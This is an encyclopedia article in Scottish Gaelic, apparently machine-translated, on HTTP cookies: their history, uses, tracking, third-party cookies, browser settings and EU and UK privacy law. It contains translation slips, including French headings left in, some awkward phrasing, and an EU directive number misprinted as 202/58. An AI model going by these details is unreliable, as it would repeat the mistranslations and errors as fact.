Briosgaidean eadar-lìn: dè a th’ ann? Mìneachadh, Tùsan, Seòrsan agus Prìobhaideachd

Un briosgaid no briosgaid lìn (no briosgaid, air a ghiorrachadh mar fhianais ann an Quebec) air a mhìneachadh le protocol conaltraidh HTTP mar shreath fiosrachaidh a chuir frithealaiche HTTP gu neach-dèiligidh HTTP, a thilleas an dàrna fear gach uair a thèid an aon fhrithealaiche HTTP a cheasnachadh fo chumhachan sònraichte.

Tha am briosgaid co-ionann ri a faidhle teacsa beag air a stòradh air an inneal-crìochnachaidh de neach-cleachdaidh an eadar-lìn. Air a bhith ann airson còrr air 20 bliadhna, leigidh iad le luchd-leasachaidh làrach-lìn dàta luchd-cleachdaidh a stòradh gus an seòladh aca a dhèanamh comasach agus gnìomhan sònraichte a cheadachadh. Tha briosgaidean an-còmhnaidh air a bhith gu ìre mhòr connspaideach leis gu bheil fiosrachadh pearsanta air fhàgail ann a dh’ fhaodadh treas phàrtaidhean brath a ghabhail air.

Thèid a chuir mar bann-cinn HTTP leis an t-seirbheisiche lìn chun bhrobhsair lìn a thilleas e gun atharrachadh gach uair a gheibh e cothrom air an fhrithealaiche. Faodar briosgaid a chleachdadh airson dearbhadh, seisean (cumail suas stàite), agus airson stòradh fiosrachadh sònraichte mun neach-cleachdaidh, leithid roghainnean làraich no susbaint cairt ceannach dealanach. Tha am facal cookie a’ tighinn bho briosgaid dhraoidheil, bun-bheachd ainmeil ann an coimpiutaireachd UNIX, a bhrosnaich beachd agus ainm briosgaidean brabhsair. Tha beagan roghainnean eile ann seach briosgaidean, gach fear le na cleachdaidhean, buannachdan agus eas-bhuannachdan aca fhèin.

Leis gur e faidhlichean teacsa sìmplidh a th’ ann, chan urrainnear briosgaidean a chuir an gnìomh. Chan eil iad no spyware no bhìorasan, ged a lorgar briosgaidean bho chuid de làraich le mòran bathar-bog an-aghaidh bhìoras oir leigidh iad le luchd-cleachdaidh a bhith air an lorg nuair a thadhlas iad air iomadh làrach. 

Bheir a’ mhòr-chuid de bhrobhsairean an latha an-diugh cothrom do luchd-cleachdaidh co-dhùnadh am bu chòir gabhail ri no diùltadh briosgaidean. Faodaidh luchd-cleachdaidh cuideachd tagh dè cho fada 'sa tha briosgaidean air an stòradh. Ach, le bhith a’ diùltadh briosgaidean gu tur tha cuid de làraich do-dhèanta a chleachdadh. Mar eisimpleir, stòraich cairtean ceannach no làraich a dh ’fheumas logadh a-steach a’ cleachdadh teisteanasan (ainm-cleachdaidh agus facal-faire).

Historique

Am facal cookie a’ tighinn bhon fhacal Bheurla briosgaid dhraoidheil, a tha na phasgan dàta a gheibh prògram agus a thilleas gun atharrachadh. Bha briosgaidean air an cleachdadh mar-thà ann an coimpiutaireachd nuair Lou Montulli bha beachd aca an cleachdadh ann an conaltradh lìn anns an Ògmhios 1994. Aig an àm sin, bha e air fhastadh le Netscape Communications, a bha air tagradh e-malairt a leasachadh airson teachdaiche. Thug briosgaidean fuasgladh don duilgheadas a thaobh earbsachd buileachadh cairt bhùthan brìgheil stòr.

Sgrìobh John Giannandrea agus Lou Montulli a’ chiad sònrachadh cookie aig Netscape an aon bhliadhna. Tionndadh 0.9 beta de Mosaic Netscape, air fhoillseachadh air 13 Dàmhair, 1994, aonaichte teicneòlas cookie (faic post). B’ e a’ chiad chleachdadh (neo-dheuchainneach) de bhriosgaidean gus faighinn a-mach an robh luchd-tadhail air làrach-lìn Netscape air tadhal air an làrach roimhe seo. Chuir Montulli a-steach tagradh peutant airson teicneòlas cookie ann an 1995, agus chaidh patent na SA 5774670 a bhuileachadh. air a bhuileachadh ann an 1998.

Às deidh dhaibh a bhith air an cur an gnìomh ann an Netscape 0.9 beta ann an 1994, chaidh briosgaidean fhilleadh a-steach do Internet Explorer 2, a chaidh fhoillseachadh san Dàmhair 1995.

Chan eil fios aig a’ mhòr-shluagh fhathast mu bhith a’ toirt a-steach briosgaidean. Gu sònraichte, chaidh gabhail ri briosgaidean gu bunaiteach ann an roghainnean brabhsair, agus cha deach innse do luchd-cleachdaidh gun robh iad an làthair. Bha cuid de dhaoine mothachail gu robh briosgaidean ann timcheall air a’ chiad ràithe de 1995, ach cha do ghabh am poball gu bith iad às deidh don Financial Times artaigil fhoillseachadh air 12 Gearran 1996. Anns an aon bhliadhna, fhuair briosgaidean mòran aire bho na meadhanan air sgàth sàrachadh prìobhaideachd a dh’ fhaodadh a bhith ann. Chaidh cuspair briosgaidean a dheasbad ann an dà cho-chomhairle le Coimisean Malairt Feadarail Ameireagaidh ann an 1996 agus 1997.

Bha leasachadh air an t-sònrachadh oifigeil cookie a’ dol air adhart mu thràth. Thachair a’ chiad chòmhraidhean mun t-sònrachadh oifigeil sa Ghiblean 1995 air liosta puist www-talk. Chaidh buidheann-obrach sònraichte IETF a stèidheachadh. Chaidh dà mholadh eile airson gnothaichean stàite a thoirt a-steach do HTTP a mholadh le Brian Behlendorf agus Dàibhidh Kristol fa leth, ach cho-dhùin a’ bhuidheann, air a stiùireadh le Kristol fhèin, sònrachadh Netscape a chleachdadh mar thoiseach tòiseachaidh. Anns a’ Ghearran 1996, cho-dhùin a’ bhuidheann obrach gun robh briosgaidean treas-phàrtaidh nan cunnart mòr do dhìomhaireachd. Chaidh an sònrachadh a rinn a’ bhuidheann fhoillseachadh mu dheireadh mar RFC 2109.

Bho dheireadh 2014, chì sinn bratach mu bhriosgaidean air iomadh làrach. Tha co-dhiù aon leudachadh brabhsair ann a leigeas leis an bratach nach eil air a thaisbeanadh.

Seòrsaichean briosgaidean agus cleachdaidhean

Stiùireadh seisean

Faodar briosgaidean a chleachdadh gus dàta luchd-cleachdaidh a chumail aig àm seòladh, ach cuideachd thairis air grunn thursan. Chaidh briosgaidean a thoirt a-steach gus dòigh a thoirt seachad airson cairtean ceannach dealanach a chuir an gnìomh, inneal brìgheil anns an urrainn don neach-cleachdaidh na stuthan a tha e airson a cheannach a chruinneachadh fhad ‘s a tha iad a’ brobhsadh air an làrach.

An-diugh, bidh aplacaidean mar chairtean ceannach an àite sin a’ stòradh an liosta de nithean ann an stòr-dàta air frithealaiche, a tha nas fheàrr; na bhith gan sàbhaladh sa bhriosgaid fhèin. Bidh am frithealaiche lìn a’ cur briosgaid anns a bheil ID seisean sònraichte. Bidh am brabhsair-lìn an uairsin a’ tilleadh ID an t-seisein seo air gach iarrtas às deidh sin agus tha na nithean sa bhasgaid air an sàbhaladh agus co-cheangailte ris an dearbh ID seisean sònraichte seo.

Tha cleachdadh bhriosgaidean gu tric feumail airson logadh a-steach air làrach a’ cleachdadh teisteanasan. Ann an ùine ghoirid, bidh am frithealaiche lìn an-toiseach a’ cur briosgaid anns a bheil ID seisean sònraichte. An uairsin bidh luchd-cleachdaidh a’ toirt seachad na teisteanasan aca (mar as trice ainm-cleachdaidh agus facal-faire). Bidh an aplacaid lìn an uairsin a’ dearbhadh an t-seisein agus a’ leigeil leis an neach-cleachdaidh faighinn chun t-seirbheis.

pearsanachadh

Faodar briosgaidean a chleachdadh gus fiosrachadh a chuimhneachadh mu neach-cleachdaidh làrach, gus susbaint iomchaidh a shealltainn dha san àm ri teachd. Mar eisimpleir, faodaidh frithealaiche lìn briosgaid a chuir anns a bheil an t-ainm-cleachdaidh mu dheireadh a chaidh a chleachdadh airson logadh a-steach air an làrach-lìn sin, gus an tèid an t-ainm neach-cleachdaidh a chuir a-steach ro-làimh air tursan san àm ri teachd.

Bidh mòran làraich-lìn a’ cleachdadh briosgaidean airson pearsanachadh a rèir roghainnean luchd-cleachdaidh. Bidh luchd-cleachdaidh a’ taghadh na roghainnean aca ann am foirm agus gan cur a-steach don fhrithealaiche. Bidh am frithealaiche a’ còdachadh nan roghainnean ann am briosgaid agus ga chuir air ais chun bhrobhsair. Às deidh sin, a h-uile uair a gheibh an neach-cleachdaidh cothrom air duilleag den làrach seo, tillidh am brabhsair am briosgaid agus mar sin liosta nan roghainnean; faodaidh am frithealaiche an duilleag a ghnàthachadh an uair sin a rèir roghainnean an neach-cleachdaidh. Mar eisimpleir, tha làrach-lìn Wikipedia a’ leigeil leis an luchd-cleachdaidh aige craiceann na làraich as fheàrr leotha a thaghadh. Leigidh einnsean sgrùdaidh Google leis an luchd-cleachdaidh aige (eadhon ged nach eil iad clàraichte) an àireamh de thoraidhean a tha iad airson fhaicinn air gach duilleag thoraidhean a thaghadh.

A 'tracadh

Bithear a’ cleachdadh bhriosgaidean tracadh gus sùil a chumail air cleachdaidhean brobhsaidh luchd-cleachdaidh an eadar-lìn. Faodar seo a dhèanamh ann am pàirt cuideachd le bhith a’ cleachdadh seòladh IP a’ choimpiutair a’ dèanamh iarrtas airson duilleag no le bhith a’ cleachdadh bann-cinn HTTP ‘referer’ a chuireas an neach-dèiligidh leis a h-uile iarrtas, ach leigidh briosgaidean le barrachd mionaideachd. Faodar seo a dhèanamh mar anns an eisimpleir a leanas:

1. Ma dh’iarras an neach-cleachdaidh duilleag air làrach, agus nach eil briosgaid san iarrtas, tha am frithealaiche a’ gabhail ris gur e seo a’ chiad duilleag air an do thadhail an cleachdaiche. Bidh an frithealaiche an uairsin a’ cruthachadh sreang air thuaiream agus ga chuir chun bhrobhsair còmhla ris an duilleag a chaidh iarraidh.
2. Bhon mhionaid seo, thèid am briosgaid a chuir gu fèin-ghluasadach leis a’ bhrobhsair gach uair a thèid duilleag ùr den làrach a ghairm. Cuiridh am frithealaiche an duilleag mar as àbhaist, ach logaidh e cuideachd URL na duilleige ris an canar, ceann-latha, àm an iarrtais agus a’ bhriosgaid ann am faidhle log.

Le bhith a’ coimhead air an fhaidhle log, tha e comasach an uairsin faicinn dè na duilleagan air an do thadhail an neach-cleachdaidh agus dè an òrdugh. Mar eisimpleir, ma tha beagan iarrtasan anns an fhaidhle a chaidh a dhèanamh a’ cleachdadh a’ bhriosgaid id=abc, dh’ fhaodadh seo dearbhadh gu bheil na h-iarrtasan sin uile a’ tighinn bhon aon chleachdaiche. Tha an URL a dh’ iarradh, an ceann-latha agus an uair a tha co-cheangailte ris na h-iarrtasan a’ leigeil le brabhsadh an neach-cleachdaidh a bhith air a leantainn.

Bidh briosgaidean treas-phàrtaidh agus lòchrain lìn, a tha air am mìneachadh gu h-ìosal, cuideachd a’ comasachadh tracadh thar diofar làraich. Bithear a’ cleachdadh tracadh làraich singilte sa chumantas airson adhbharan staitistigeil. An coimeas ri sin, bidh companaidhean sanasachd a’ cleachdadh tracadh thar diofar làraich a’ cleachdadh briosgaidean treas-phàrtaidh sa chumantas gus pròifilean cleachdaiche gun urra a thoirt gu buil (a tha an uairsin air an cleachdadh gus faighinn a-mach dè na sanasan a bu chòir a shealltainn don neach-cleachdaidh a bharrachd air puist-d a chuir thuige a rèir nan sanasan sin - SPAM ).

Tha a bhith a’ cumail sùil air briosgaidean nan cunnart ionnsaigh a thoirt air prìobhaideachd luchd-cleachdaidh ach faodar an toirt air falbh gu furasta. Tha a’ mhòr-chuid de bhrobhsairean an latha an-diugh a’ toirt a-steach roghainn gus briosgaidean leantainneach a dhubhadh às gu fèin-ghluasadach nuair a dhùineas iad an tagradh.

Briosgaidean treas-phàrtaidh

Faodaidh ìomhaighean agus nithean eile a tha air duilleag-lìn fuireach air frithealaichean eadar-dhealaichte bhon fhear air a bheil an duilleag. Gus an duilleag a thaisbeanadh, luchdaichidh am brabhsair na stuthan sin gu lèir sìos. Tha fiosrachadh bho dhiofar thobraichean anns a’ mhòr-chuid de làraich-lìn. Mar eisimpleir, ma chuireas tu www.example.com a-steach don bhrobhsair agad, gu tric bidh nithean no sanasan air pàirt den duilleag a thig bho thùsan eadar-dhealaichte, i.e. bho àrainn eadar-dhealaichte seach www.example.com. Is e briosgaidean pàrtaidh “ciad” briosgaidean a tha air an suidheachadh leis an àrainn a tha air a liostadh ann am bàr seòlaidh a’ bhrobhsair. Bidh briosgaidean treas-phàrtaidh air an suidheachadh le aon de na stuthan duilleag a thig bho raon eile.

Gu gnàthach, bidh brobhsairean mar Mozilla Firefox, Microsoft Internet Explorer agus Opera a’ gabhail ri briosgaidean treas-phàrtaidh, ach faodaidh luchd-cleachdaidh na roghainnean atharrachadh ann an roghainnean brabhsair gus am bacadh. Chan eil cunnart tèarainteachd sam bith ann am briosgaidean treas-phàrtaidh a bheir comas do ghnìomhachd lìn, ach tha iad cuideachd air an cleachdadh gus sùil a chumail air luchd-cleachdaidh. bho làrach gu làrach.

Faodaidh innealan leithid Ghostery a tha rim faighinn airson a h-uile brobhsair a’ toirt a-steach Google Chrome casg a chuir air iomlaidean eadar treas phàrtaidhean.

Buileachadh

Is e pìosan beaga de dhàta a th’ ann am briosgaidean a chuireas am frithealaiche lìn chun bhrobhsair. Bidh am brabhsair gan tilleadh gun atharrachadh chun t-seirbheisiche, a’ toirt a-steach staid (cuimhne air tachartasan san àm a dh’ fhalbh) a-steach don ghnothach HTTP gun stàit. Às aonais briosgaidean, is e tachartas iomallach a th’ ann an ath-lorg duilleag-lìn no pàirt de dhuilleag-lìn, neo-eisimeileach bho iarrtasan eile a thèid a dhèanamh chun an aon làrach. A bharrachd air a bhith comasach air a shuidheachadh leis an t-seirbheisiche lìn, faodar briosgaidean a shuidheachadh cuideachd le bhith a’ sgrìobhadh chànanan leithid JavaScript, ma tha iad a’ faighinn taic agus ùghdarraichte leis a’ bhrabhsair.

Tha an sònrachadh oifigeil cookie a’ moladh gum bu chòir gum biodh e comasach dha brobhsairean an àireamh as lugha de bhriosgaidean a shàbhaladh agus a chuir air ais. Gu sònraichte, bu chòir gum biodh e comasach do bhrobhsair co-dhiù 300 briosgaid de cheithir kilobytes gach fear a stòradh, agus co-dhiù 20 briosgaidean airson aon fhrithealaiche no àrainn.

A rèir earrann 3.1 de RFC 2965, tha ainmean bhriosgaid neo-mhothachail.

Faodaidh briosgaid an ceann-latha a tha e a’ tighinn gu crìch a shònrachadh, agus sa chùis sin thèid am briosgaid a dhubhadh às air a’ cheann-latha seo. Mura sònraich a’ bhriosgaid ceann-latha crìochnachaidh, thèid am briosgaid a dhubhadh às cho luath ‘s a dh’ fhàgas an neach-cleachdaidh a bhrobhsair. Mar sin, tha sònrachadh ceann-latha crìochnachaidh mar dhòigh air toirt air a’ bhriosgaid a bhith beò tro iomadh seisean. Air an adhbhar seo, thathar ag ràdh gu bheil briosgaidean le ceann-latha crìochnachaidh seasmhach. Iarrtas eisimpleir: dh’ fhaodadh làrach reic briosgaidean seasmhach a chleachdadh gus na stuthan a chuir luchd-cleachdaidh a-steach sa chairt bhùthan aca a chlàradh (gu fìrinneach, is dòcha gu bheil am briosgaid a’ toirt iomradh air inntrig a chaidh a shàbhaladh ann an stòr-dàta air an làrach reic, agus chan ann sa choimpiutair agad) . Tro seo, ma dh’ fhàgas luchd-cleachdaidh am brabhsair aca gun a bhith a’ ceannach agus gun till iad thuige nas fhaide air adhart, bidh e comasach dhaibh na stuthan sa chairt a lorg a-rithist. Mura tug na briosgaidean sin ceann-latha crìochnachaidh, thigeadh iad gu crìch nuair a dhùin am brabhsair, agus bhiodh am fiosrachadh mu na tha sa bhasgaid air a chall.

Faodaidh briosgaidean a bhith cuibhrichte ann an raon gu raon sònraichte, fo-àrainn no slighe air an fhrithealaiche a chruthaich iad.

Cruthachadh briosgaid

Tha gluasad dhuilleagan lìn air a dhèanamh a’ cleachdadh an HyperText Transfer Protocol (HTTP). Le bhith a’ seachnadh bhriosgaidean, bidh brobhsairean a’ gairm duilleag bho luchd-frithealaidh lìn le bhith a’ cur teacsa ghoirid thuca mar as trice ris an canar Iarrtas HTTP. Mar eisimpleir, gus faighinn chun duilleag www.example.org/index.html, bidh brobhsairean a’ ceangal ris an fhrithealaiche www.example.org agus a’ cur iarrtas a tha coltach ri seo:

	GET /index.html HTTP/1.1Host: www.example.org
Navigator	→	serveur

Bidh am frithealaiche a’ freagairt le bhith a’ cur na duilleige a chaidh iarraidh, le teacsa coltach ris roimhe, agus an t-iomlan ga ghairm Freagairt HTTP. Faodaidh loidhnichean a bhith sa phacaid seo ag iarraidh air a’ bhrobhsair briosgaidean a stòradh:

	HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: ainm = luach (duilleag HTML)
Navigator	←	serveur

Cha chuir am frithealaiche an loidhne Set-Cookie ach, ma tha an frithealaiche ag iarraidh gum bi am brabhsair a’ stòradh briosgaid. 'S e iarrtas a th' ann an Set-Cookie airson a' bhrabhsair an t-sreath name=value a stòradh agus a thilleadh anns a h-uile iarrtas san àm ri teachd chun an fhrithealaiche. Ma chuireas am brobhsair taic ri briosgaidean agus ma tha briosgaidean air an comasachadh ann an roghainnean a’ bhrobhsair, bidh am briosgaid air a ghabhail a-steach anns a h-uile iarrtas às deidh sin a thèid a dhèanamh chun aon fhrithealaiche. Mar eisimpleir, bidh am brabhsair a’ gairm na duilleige www.example.org/news.html le bhith a’ cur an iarrtas a leanas chun t-seirbheisiche www.example.org:

	GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*
Navigator	→	serveur

Seo iarrtas airson duilleag eile bhon aon fhrithealaiche, agus tha e eadar-dhealaichte bhon chiad fhear gu h-àrd a chionn 's gu bheil sreang ann a chuir am frithealaiche dhan bhrabhsair roimhe. Taing dha seo, tha fios aig an fhrithealaiche gu bheil an t-iarrtas seo ceangailte ris an fhear roimhe. Bidh am frithealaiche a’ freagairt le bhith a’ cur na duilleig ris an canar, agus cuideachd le bhith a’ cur briosgaidean eile ris.

Faodaidh am frithealaiche luach a’ bhriosgaid atharrachadh le bhith a’ cur loidhne ùr Set-Cookie: name=new_value mar fhreagairt don duilleag ris an canar. Bidh am brabhsair an uairsin a’ dol an àite an t-seann luach leis an fhear ùr.

Mar as trice bidh an loidhne Set-Cookie air a chruthachadh le prògram CGI no cànan sgrìobhaidh eile, chan ann leis an fhrithealaiche HTTP. Cha chuir am frithealaiche HTTP (eisimpleir: Apache) ach toradh a’ phrògraim (sgrìobhainn air a bheil an ceann-cinn anns a bheil na briosgaidean roimhe) chun bhrobhsair.

Faodar briosgaidean a shuidheachadh cuideachd le JavaScript no cànanan eile den aon seòrsa a tha a’ ruith sa bhrobhsair, i.e. air taobh an neach-dèiligidh seach taobh an fhrithealaiche. Ann an JavaScript, tha an nì document.cookie air a chleachdadh airson an adhbhair seo. Mar eisimpleir, tha an aithris document.cookie = "teòthachd = 20" a 'cruthachadh briosgaid leis an ainm "teòthachd" agus le luach 20.

Feartan briosgaid

A bharrachd air an ainm/càraid luach, faodaidh ceann-latha crìochnachaidh, slighe, ainm àrainn agus an seòrsa ceangail a thathar a’ sùileachadh a bhith ann am briosgaid, i.e. àbhaisteach no crioptaichte. Tha RFC 2965 cuideachd a’ mìneachadh gum feum àireamh tionndaidh èigneachail a bhith aig briosgaidean, ach sa chumantas tha seo air fhàgail às. Tha na pàirtean dàta seo a’ leantainn an ainm = new_value pair agus air an sgaradh le leth-choloin. Mar eisimpleir, faodaidh am frithealaiche briosgaid a chruthachadh le bhith a’ cur loidhne Set-Cookie: name=new_value; ceann-latha = ceann-latha; slighe =/; àrainn=.example.org.

Crìochnaich briosgaid

Thig briosgaidean gu crìch agus an uairsin cha tèid an cur leis a’ bhrobhsair chun t-seirbheisiche anns na suidheachaidhean a leanas:

• Nuair a tha am brabhsair dùinte, mura h-eil am briosgaid seasmhach.
• Nuair a tha ceann-latha crìochnachaidh a’ bhriosgaid seachad.
• Nuair a thèid ceann-latha crìochnachaidh a’ bhriosgaid atharrachadh (leis an fhrithealaiche no leis an sgriobt) gu ceann-latha san àm a dh’ fhalbh.
• Nuair a sguabas am brabhsair às a’ bhriosgaid air iarrtas an neach-cleachdaidh.

Tha an treas suidheachadh a’ leigeil le frithealaichean no sgriobtaichean briosgaid a dhubhadh às gu follaiseach. Thoir an aire gu bheil e comasach le brabhsair lìn Google Chrome fios a bhith agad air ceann-latha crìochnachaidh briosgaid sònraichte le bhith a’ faighinn cothrom air na roghainnean susbaint. Is dòcha gum fuirich briosgaid a chaidh a shàbhaladh air coimpiutair ann airson grunn dheicheadan mura tèid dòigh sam bith a chleachdadh airson a dhubhadh às.

Stereotypes

Bho chaidh an toirt a-steach air an eadar-lìn, tha mòran bheachdan mu bhriosgaidean air cuairteachadh air an eadar-lìn agus anns na meadhanan. Ann an 1998, cho-dhùin CIAC, Sgioba Sgrùdaidh Tachartas Coimpiutaireachd Roinn Cumhachd na Stàitean Aonaichte, gu robh so-leòntachd tèarainteachd cookie “gu ìre mhòr nach eil ann” agus mhìnich iad “fiosrachadh mu thùs do thursan agus mion-fhiosrachadh mu na duilleagan lìn air an do thadhail thu. ann mu thràth ann am faidhlichean log nan frithealaichean lìn”. Ann an 2005, dh’fhoillsich Jupiter Research toraidhean sgrùdaidh, anns an do bheachdaich àireamh mhòr sa cheud den luchd-fhreagairt air na h-aithrisean a leanas:

• Tha briosgaidean coltach ri bhìoras, bidh iad a’ toirt buaidh air draibhean cruaidh luchd-cleachdaidh.
• Bidh briosgaidean a’ gineadh pop suas.
• Bidh briosgaidean gan cleachdadh airson an cur spama.
• Chan eil briosgaidean gan cleachdadh ach airson sanasachd.

Chan urrainn dha briosgaidean fiosrachadh a sguabadh às no a leughadh bho choimpiutair an neach-cleachdaidh. Ach, bidh briosgaidean ga dhèanamh comasach na duilleagan lìn air an do thadhail neach-cleachdaidh air làrach sònraichte no seata de làraich a lorg. Faodar am fiosrachadh seo a chruinneachadh ann am pròifil neach-cleachdaidh a dh’ fhaodar a chleachdadh no ath-reic ri treas phàrtaidhean, a dh’ fhaodadh cùisean prìobhaideachd trom adhbhrachadh. Tha cuid de phròifil gun urra, leis nach eil fiosrachadh pearsanta annta, ach faodaidh eadhon na pròifilean sin a bhith teagmhach.

A rèir an aon sgrùdadh, chan eil fios aig àireamh mhòr sa cheud de luchd-cleachdaidh an eadar-lìn mar a sguabas iad às briosgaidean. Is e aon de na h-adhbharan nach eil earbsa aig daoine ann am briosgaidean gu bheil cuid de làraich air ana-cleachdadh a dhèanamh air taobh comharrachadh bhriosgaidean gu pearsanta agus air am fiosrachadh seo a cho-roinn le stòran eile. Tha ceudad mòr de shanasachd cuimsichte agus post-d gun iarraidh, air a mheas mar spam, a’ tighinn bho fhiosrachadh a chaidh a chruinneachadh bho bhith a’ cumail sùil air briosgaidean.

Roghainnean brabhsair

Bidh a’ mhòr-chuid de bhrobhsairean a’ toirt taic do bhriosgaidean agus a’ leigeil leis an neach-cleachdaidh an cur à comas. Is iad na roghainnean as cumanta:

• Dèan comas no cuir à comas briosgaidean gu tur, gus an tèid gabhail riutha no bacadh orra gu cunbhalach.
• Leig leis a’ chleachdaiche na briosgaidean gnìomhach fhaicinn ann an duilleag sònraichte, le bhith a’ dol a-steach javascript: alert(document.cookie) ann am bàr seòlaidh a’ bhrobhsair. Bidh cuid de bhrobhsairean a’ toirt a-steach manaidsear bhriosgaid airson an neach-cleachdaidh as urrainn briosgaidean fhaicinn agus a sguabadh às gu roghnach a tha sa bhrobhsair an-dràsta.

Bidh a’ mhòr-chuid de bhrobhsairean cuideachd a’ ceadachadh dàta pearsanta a dhubhadh às gu h-iomlan a tha a’ toirt a-steach briosgaidean. Tha modalan a bharrachd ann cuideachd airson smachd a chumail air ceadan bhriosgaidean.

Prìobhaideachd agus briosgaidean treas-phàrtaidh

Anns an eisimpleir mhìorbhaileach seo, tha companaidh sanasachd air brataichean a chuir air dà làrach-lìn. Le bhith a’ cumail nam brataichean air na frithealaichean aca agus a’ cleachdadh bhriosgaidean treas-phàrtaidh, bidh e comasach don chompanaidh sanasachd sùil a chumail air seòladh an neach-cleachdaidh tron ​​dà làrach seo.

Tha buaidh chudromach aig briosgaidean air prìobhaideachd agus gun urra luchd-cleachdaidh lìn. Ged nach tèid briosgaidean a chuir air ais ach chun an fhrithealaiche a shuidhich iad no gu frithealaiche leis an aon àrainn eadar-lìn, ge-tà, faodaidh gum bi ìomhaighean no co-phàirtean eile air duilleag-lìn air an stòradh air frithealaichean a bhuineas do raointean eile. Canar na briosgaidean a thèid a shuidheachadh nuair a thèid na pàirtean taobh a-muigh sin a thoirt air ais briosgaidean treas-phàrtaidh. Tha seo a’ toirt a-steach briosgaidean bho uinneagan pop-up nach eileas ag iarraidh.

Bidh companaidhean sanasachd a’ cleachdadh briosgaidean treas-phàrtaidh gus sùil a chumail air luchd-cleachdaidh thar nan diofar làraich air am bi iad a’ tadhal. Gu sònraichte, faodaidh companaidh sanasachd sùil a chumail air neach-cleachdaidh thar gach duilleag far an do chuir e ìomhaighean sanasachd no piogsail tracadh. Tha eòlas air na duilleagan air an do thadhail an neach-cleachdaidh a’ leigeil leis a’ chompanaidh sanasachd cuimseachadh air roghainnean sanasachd an neach-cleachdaidh.

Tha cuid den bheachd gur e ionnsaigh prìobhaideachd a th’ ann an comas pròifil cleachdaiche a thogail, gu sònraichte nuair a thathar a’ cumail sùil air diofar raointean a’ cleachdadh briosgaidean treas-phàrtaidh. Air an adhbhar seo, tha reachdas cookie aig cuid de dhùthchannan.

Chuir riaghaltas nan Stàitean Aonaichte an gnìomh riaghailtean teann mu shuidheachadh bhriosgaidean ann an 2000, às deidh dha nochdadh gu robh Oifis Poileasaidh Drogaichean an Taigh Gheal a’ cleachdadh briosgaidean gus sùil a chumail air coimpiutairean luchd-cleachdaidh a bha a’ coimhead air sanasan dhrogaichean air-loidhne. Ann an 2002, lorg an neach-iomairt prìobhaideachd Daniel Brandt gun do dh’ fhàg an CIA briosgaidean leantainneach air coimpiutairean a bha air tadhal air na làraich-lìn aca. Aon uair ‘s gun deach fios fhaighinn mun bhriseadh seo, dh’ ainmich an CIA nach deach na briosgaidean sin a chuir a dh’aona ghnothach agus sguir iad gan suidheachadh. Air 25 Dùbhlachd 2005, lorg Brandt gu robh a’ Bhuidheann Tèarainteachd Nàiseanta (NSA) air dà bhriosgaid sheasmhach fhàgail air coimpiutairean luchd-tadhail air sgàth ùrachadh bathar-bog. Às deidh fios fhaighinn, chuir an NSA à comas briosgaidean sa bhad.

Anns an Rìoghachd Aonaichte, tha an Lagh cookie “, a thàinig gu bith air 25 Cèitean, 2012, ag iarraidh air na làraich na rùintean aca fhoillseachadh, agus mar sin a’ leigeil le luchd-cleachdaidh taghadh a bheil iad airson lorgan fhàgail no nach eil air an eadar-lìn. Mar sin faodaidh iad a bhith air an dìon bho targaidean sanasachd. Ach, A rèir The Guardian, chan eil cead luchd-cleachdaidh an eadar-lìn gu riatanach soilleir; chaidh atharrachaidhean a dhèanamh air teirmean cead neach-cleachdaidh, ga dhèanamh mar sin air a thuigsinn.

Stiùireadh 2002/58 air prìobhaideachd

Ann an Stiùireadh 202/58 prìobhaideachd agus conaltradh dealanach, tha riaghailtean air cleachdadh bhriosgaidean. Gu sònraichte, tha artaigil 5, paragraf 3 den stiùireadh seo ag iarraidh nach urrainnear stòradh dàta (leithid briosgaidean) ann an coimpiutair an neach-cleachdaidh a dhèanamh ach ma tha:

• tha fios aig an neach-cleachdaidh mar a thèid an dàta a chleachdadh;
• gheibh an neach-cleachdaidh an roghainn an obair stòraidh seo a dhiùltadh. Ach, tha an artaigil seo cuideachd ag ràdh gu bheil stòradh dàta airson adhbharan teicnigeach saor bhon lagh seo.

Bhathar an dùil a bhith air a bhuileachadh bhon Dàmhair 2003, ge-tà, cha deach an stiùireadh a chuir an gnìomh ach gu math neo-fhoirfe a rèir aithisg san Dùbhlachd 2004, a chomharraich cuideachd nach robh cuid de Bhall-stàitean (Slòcaia, Latbhia, a’ Ghrèig, a’ Bheilg agus Lucsamburg) fhathast air an atharrachadh. stiùireadh ann an lagh dachaigheil.

A rèir beachd an G29 ann an 2010, tha an stiùireadh seo, a tha gu sònraichte a’ sònrachadh cleachdadh bhriosgaidean airson adhbharan sanasachd giùlain, air cead soilleir neach-cleachdaidh an eadar-lìn fhathast air a chuir an sàs gu dona. Gu dearbh, bidh a 'mhòr-chuid de làraichean a' dèanamh sin ann an dòigh nach eil a 'gèilleadh ris an stiùireadh, le bhith gan cuingealachadh fhèin gu "bratach" sìmplidh a' toirt fiosrachadh mu chleachdadh "briosgaidean" gun a bhith a 'toirt seachad fiosrachadh mu na cleachdaidhean, gun a bhith a' dèanamh eadar-dhealachadh eadar briosgaidean "teicnigeach". briosgaidean “tracadh”, no fìor roghainn a thabhann don neach-cleachdaidh a tha airson briosgaidean teignigeach a chumail suas (leithid briosgaidean stiùireadh cairt bhùthan) agus briosgaidean “tracadh” a dhiùltadh. Gu dearbh, chan eil mòran làraich ag obair gu ceart ma thèid briosgaidean a dhiùltadh, nach eil a’ gèilleadh ri stiùireadh 2002/58 no stiùireadh 95/46 (Dìon dàta pearsanta).

Stiùireadh 2009/136/CE

Chaidh an stuth seo ùrachadh le Stiùireadh 2009/136/EC leis an deit 25 Samhain, 2009 a tha ag ràdh gu bheil “stòradh fiosrachaidh, no faighinn gu fiosrachadh a tha air a stòradh mar-thà, ann an uidheamachd crìochnachaidh neach-clàraidh no neach-cleachdaidh ceadaichte a-mhàin air chùmhnant tha an neach-clàraidh no an neach-cleachdaidh air a chead a thoirt seachad, às deidh dha fiosrachadh soilleir agus coileanta fhaighinn, a rèir Stiùireadh 95/46/EC, eadar feadhainn eile mu adhbharan a’ ghiollachd”. Mar sin tha an stiùireadh ùr a’ neartachadh nan dleastanasan mus cuir thu briosgaidean air coimpiutair neach-cleachdaidh an eadar-lìn.

